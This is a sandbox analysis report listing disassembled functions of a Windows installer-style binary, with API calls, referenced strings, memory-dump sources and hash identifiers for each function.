                                                            Function 008B8F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B8E44: lstrlenW.KERNEL32(00000100,?,?,?,008B9217,000002C0,00000100,00000100,00000100,?,?,?,00897D87,?,?,000001BC), ref: 008B8E69
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008BB500,wininet.dll,?), ref: 008B907A
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008BB500,wininet.dll,?), ref: 008B9087
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                              • Part of subcall function 008B0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00898E1B), ref: 008B0EAA
                                                              • Part of subcall function 008B0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00898E1B,00000000), ref: 008B0EC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close$EnumInfoOpenQuerylstrlen
                                                            • String ID: wininet.dll
                                                            • API String ID: 2680864210-3354682871
                                                            • Opcode ID: 4347000f790c9de4e8af3dc9a42e3de030cfb0c311139dcb893c8d496e421259
                                                            • Instruction ID: 62d2352a29f0b58984580cb3de174227436c105e5c5f99abc018f6b324556ef1
                                                            • Opcode Fuzzy Hash: 4347000f790c9de4e8af3dc9a42e3de030cfb0c311139dcb893c8d496e421259
                                                            • Instruction Fuzzy Hash: 99312832C0152AEFCF21AFA8C9809EEBB79FF04710B514179EA50B6321C7319E52DB91
                                                            Function 008B939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B8E44: lstrlenW.KERNEL32(00000100,?,?,?,008B9217,000002C0,00000100,00000100,00000100,?,?,?,00897D87,?,?,000001BC), ref: 008B8E69
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008B9483
                                                            • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008B949D
                                                              • Part of subcall function 008B0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0088061A,?,00000000,00020006), ref: 008B0C0E
                                                              • Part of subcall function 008B14F4: RegSetValueExW.ADVAPI32(00020006,008C0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0087F335,00000000,?,00020006), ref: 008B1527
                                                              • Part of subcall function 008B14F4: RegDeleteValueW.ADVAPI32(00020006,008C0D10,00000000,?,?,0087F335,00000000,?,00020006,?,008C0D10,00020006,00000000,?,?,?), ref: 008B1557
                                                              • Part of subcall function 008B14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0087F28D,008C0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008B14BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Value$Close$CreateDeletelstrlen
                                                            • String ID: %ls\%ls
                                                            • API String ID: 3924016894-2125769799
                                                            • Opcode ID: 41d07c87302c523e4fe7780abd768485b2bcf6229d2ae0c150399f6751847300
                                                            • Instruction ID: 43ed3289b890f655acadb0721546089a890e5266703317a0410667f817def8d9
                                                            • Opcode Fuzzy Hash: 41d07c87302c523e4fe7780abd768485b2bcf6229d2ae0c150399f6751847300
                                                            • Instruction Fuzzy Hash: 1C311772C0112EFF8F12AF98CC818DEBBB9FB04310B554166EA54B6221D7358E21EB95
                                                            Function 00873A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _memcpy_s
                                                            • String ID: crypt32.dll$wininet.dll
                                                            • API String ID: 2001391462-82500532
                                                            • Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                            • Instruction ID: eb84e22255826bd3709a5796ece6e153ad961b67b051e507a96e5d40dd1af286
                                                            • Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                            • Instruction Fuzzy Hash: 13118E71600219ABCF08DE19CC869AFBF69EF85290B14802AFD498B315D231EA10DAE1
                                                            Function 008B14F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegSetValueExW.ADVAPI32(00020006,008C0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0087F335,00000000,?,00020006), ref: 008B1527
                                                            • RegDeleteValueW.ADVAPI32(00020006,008C0D10,00000000,?,?,0087F335,00000000,?,00020006,?,008C0D10,00020006,00000000,?,?,?), ref: 008B1557
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Value$Delete
                                                            • String ID: regutil.cpp
                                                            • API String ID: 1738766685-955085611
                                                            • Opcode ID: b6f63657468aab87109ee90be34f20ac41c9b1cd76b6b460f67b93038cd09ab7
                                                            • Instruction ID: 5d177d69a6a0f1636c15fa60fedb2af39cc4419e3e6a2755fb8851a7b8cd6662
                                                            • Opcode Fuzzy Hash: b6f63657468aab87109ee90be34f20ac41c9b1cd76b6b460f67b93038cd09ab7
                                                            • Instruction Fuzzy Hash: 5011A33695113AB7DF314A949C1DBEA7A68FB45BA0F950221BD02EE350E731CD2097E0
                                                            Function 0087DDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,00897691,00000000,IGNOREDEPENDENCIES,00000000,?,008BB518), ref: 0087DE04
                                                            Strings
                                                            • IGNOREDEPENDENCIES, xrefs: 0087DDBB
                                                            • Failed to copy the property value., xrefs: 0087DE38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                            • API String ID: 1825529933-1412343224
                                                            • Opcode ID: b69b73b1595618a47e36c4358c0ce4f26c5ae1b9a8cf2c8a6f3460e8af51dc4e
                                                            • Instruction ID: 075c5909b35f87265843475031967dd7298919600703a366079c3a794e39baba
                                                            • Opcode Fuzzy Hash: b69b73b1595618a47e36c4358c0ce4f26c5ae1b9a8cf2c8a6f3460e8af51dc4e
                                                            • Instruction Fuzzy Hash: C5118F32204315AFDB225E58DC84FAA77B6FF54324F258179FA1CEB2A5C770E8508A90
                                                            Function 008B563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00888E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 008B566E
                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00888E97,?), ref: 008B5689
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: InfoNamedSecuritySleep
                                                            • String ID: aclutil.cpp
                                                            • API String ID: 2352087905-2159165307
                                                            • Opcode ID: becd076e94535a185722479454ea80a96a113eacbfae07e7ee71673eca42a938
                                                            • Instruction ID: 6a3ae65732110e135259d37793126f588ade9858dd0f15de86262fe1eab5bfff
                                                            • Opcode Fuzzy Hash: becd076e94535a185722479454ea80a96a113eacbfae07e7ee71673eca42a938
                                                            • Instruction Fuzzy Hash: 6B015E33801929BBCF229E89CD05FDE7F65FF69750F064255BD04A6220C6729D20ABD1
                                                            Function 0087158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(0000007F,00000000,00000000,008870E8,00000000,008870E8,00000000,00000000,008870E8,00000000,00000000,00000000,?,00872318,00000000,00000000), ref: 008715D0
                                                            • GetLastError.KERNEL32(?,00872318,00000000,00000000,008870E8,00000200,?,008B52B2,00000000,008870E8,00000000,008870E8,00000000,00000000,00000000), ref: 008715DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastString
                                                            • String ID: strutil.cpp
                                                            • API String ID: 3728238275-3612885251
                                                            • Opcode ID: c4bd890d7a4d9868bae53cfce76f4f5f06467b94ddebf6a2bbe5ba19492558e3
                                                            • Instruction ID: 976136ebf43e5438f77007165db7d5d2e156a46aaec20308e75ccf93ae1794a6
                                                            • Opcode Fuzzy Hash: c4bd890d7a4d9868bae53cfce76f4f5f06467b94ddebf6a2bbe5ba19492558e3
                                                            • Instruction Fuzzy Hash: 3A01923394163667CF219E9D8C49E5B7A6CFF85B60B058224FE28EB254D660DC1087E1
                                                            Function 008857BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 008857D9
                                                            • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00885833
                                                            Strings
                                                            • Failed to initialize COM on cache thread., xrefs: 008857E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: Failed to initialize COM on cache thread.
                                                            • API String ID: 3442037557-3629645316
                                                            • Opcode ID: 29ed604f258ef1e8f1a62b69e35ec88797dd94936b0cae136b21d493d8c72446
                                                            • Instruction ID: 8f0c9bd1d89c48e374a4fd872b509f1e3337743d676af80d217edc5f156f764a
                                                            • Opcode Fuzzy Hash: 29ed604f258ef1e8f1a62b69e35ec88797dd94936b0cae136b21d493d8c72446
                                                            • Instruction Fuzzy Hash: 93016D7260061ABFCB059FA8D884DD6FBEDFF08354B008126FA19D7221DB70AD548BD0
                                                            Function 008B3BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008B3A8E,?), ref: 008B3C62
                                                            Strings
                                                            • EnableLUA, xrefs: 008B3C34
                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 008B3C0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                            • API String ID: 47109696-3551287084
                                                            • Opcode ID: fd97a7dd1cf3fdb34435aa8a3a28161a3671e87756a47fe563edf326a9245439
                                                            • Instruction ID: 29bd14b3dbaa56bc4315dd30ae4d0aaeb74c99c7a503aef053ab406610c8ff78
                                                            • Opcode Fuzzy Hash: fd97a7dd1cf3fdb34435aa8a3a28161a3671e87756a47fe563edf326a9245439
                                                            • Instruction Fuzzy Hash: 35017132910229FBD710AAA4C806BEEFBA8FB14721F2141A5A800F7251D3756F50D6D4
                                                            Function 00875123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00871104,?,?,00000000), ref: 00875142
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00871104,?,?,00000000), ref: 00875172
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareStringlstrlen
                                                            • String ID: burn.clean.room
                                                            • API String ID: 1433953587-3055529264
                                                            • Opcode ID: a3a8bca07bd416dca9b1cb240861694bf0390e6cce7e7aaaea3a1cc349547627
                                                            • Instruction ID: 280c127794d961de6a3e2837016cee144246d3ed5f7d21e138d6bb0e1b3cd48e
                                                            • Opcode Fuzzy Hash: a3a8bca07bd416dca9b1cb240861694bf0390e6cce7e7aaaea3a1cc349547627
                                                            • Instruction Fuzzy Hash: FE014F725016346E87248B489D84A63B7ADF715BA1B608316F50DD2614D7B1EC41C6A1
                                                            Function 008B6920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6985
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeString
                                                            • String ID: `<u$atomutil.cpp
                                                            • API String ID: 3341692771-4051019476
                                                            • Opcode ID: 789b1c615e58d709cc4e8d6c469d511f8163a9b3649def5a9324eebd7b3b443f
                                                            • Instruction ID: d7ce30c6b8147e70f73d07a21ffa5c6f34f968ab4b86bcde2c542ad407ecb8f0
                                                            • Opcode Fuzzy Hash: 789b1c615e58d709cc4e8d6c469d511f8163a9b3649def5a9324eebd7b3b443f
                                                            • Instruction Fuzzy Hash: AC01A232400118F7D7215A988C01BFEBFB8FF54B70F244155B804E6350A7799E21A6E1
                                                            Function 00876522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?), ref: 00876534
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                              • Part of subcall function 00875CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00875D68
                                                            Strings
                                                            • Failed to get 64-bit folder., xrefs: 00876557
                                                            • Failed to set variant value., xrefs: 00876571
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                            • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                            • API String ID: 3109562764-2681622189
                                                            • Opcode ID: 63a12645d8c80fb275d6d50206ca41c62b07f4f353b5bad94d848fad050f3dad
                                                            • Instruction ID: 3835456be784812d888f305a585f2e70324a1f27eeb63069c0c9c23307d3a836
                                                            • Opcode Fuzzy Hash: 63a12645d8c80fb275d6d50206ca41c62b07f4f353b5bad94d848fad050f3dad
                                                            • Instruction Fuzzy Hash: 9B014F32D41628BBCB22AA98CD06ADE7B78FB00761F148155F804E6259E671DF60AA91
                                                            Function 008733C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008710DD,?,00000000), ref: 008733E8
                                                            • GetLastError.KERNEL32(?,?,?,?,008710DD,?,00000000), ref: 008733FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastModuleName
                                                            • String ID: pathutil.cpp
                                                            • API String ID: 2776309574-741606033
                                                            • Opcode ID: fedeba67a60564dc8a43d36e3d2da45b326066b6be688c0e0363168d97147fab
                                                            • Instruction ID: dd584c34f40cb10d9264cc7e7894fee43af211534bb9e0bdebf51a0e66a78f3a
                                                            • Opcode Fuzzy Hash: fedeba67a60564dc8a43d36e3d2da45b326066b6be688c0e0363168d97147fab
                                                            • Instruction Fuzzy Hash: 4DF02273A0553267C732569A6C48A8BFA58FB41B70B128231FD08FB204DAA0CD00A2E2
                                                            Function 0089E30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0089EBD2
                                                              • Part of subcall function 008A1380: RaiseException.KERNEL32(?,?,?,0089EBF4,?,00000000,00000000,?,?,?,?,?,0089EBF4,?,008D7EC8), ref: 008A13DF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0089EBEF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID: Unknown exception
                                                            • API String ID: 3476068407-410509341
                                                            • Opcode ID: 263e9e0d8ab62013017f6183c23edb980ec03f8565c548502f6176ee1679a6e6
                                                            • Instruction ID: 509f4facf89517e6e53a6177ad963073ef3fcf4f2119857738b21683ecd75c5e
                                                            • Opcode Fuzzy Hash: 263e9e0d8ab62013017f6183c23edb980ec03f8565c548502f6176ee1679a6e6
                                                            • Instruction Fuzzy Hash: F1F0283490020CB7DF00FAA8D80AD5C7B2CFA01320F584271F825E2AC1EB70E915C6D2
                                                            Function 008B4A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,0087BA1D,?,?,?,00000000,00000000), ref: 008B4A1D
                                                            • GetLastError.KERNEL32(?,?,?,0087BA1D,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 008B4A27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastSize
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 464720113-2967768451
                                                            • Opcode ID: 1f262a9435dd4ab4e6b0397b826cbba950eb23de17a54e32e058a34e6758e84b
                                                            • Instruction ID: 5f5bb74f6154a2daf87f7d2d9c8b081efed7615d50242bf63f56ba7bd5501db7
                                                            • Opcode Fuzzy Hash: 1f262a9435dd4ab4e6b0397b826cbba950eb23de17a54e32e058a34e6758e84b
                                                            • Instruction Fuzzy Hash: 89F0AF72A4023ABB97209F8989069AAFBACFF04B20B01521AFD44E7300E770AD1087D5
                                                            Function 008B3D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00875466,?,00000000,00875466,?,?,?), ref: 008B3DA7
                                                            • CoCreateInstance.OLE32(00000000,00000000,00000001,008D716C,?), ref: 008B3DBF
                                                            Strings
                                                            • Microsoft.Update.AutoUpdate, xrefs: 008B3DA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
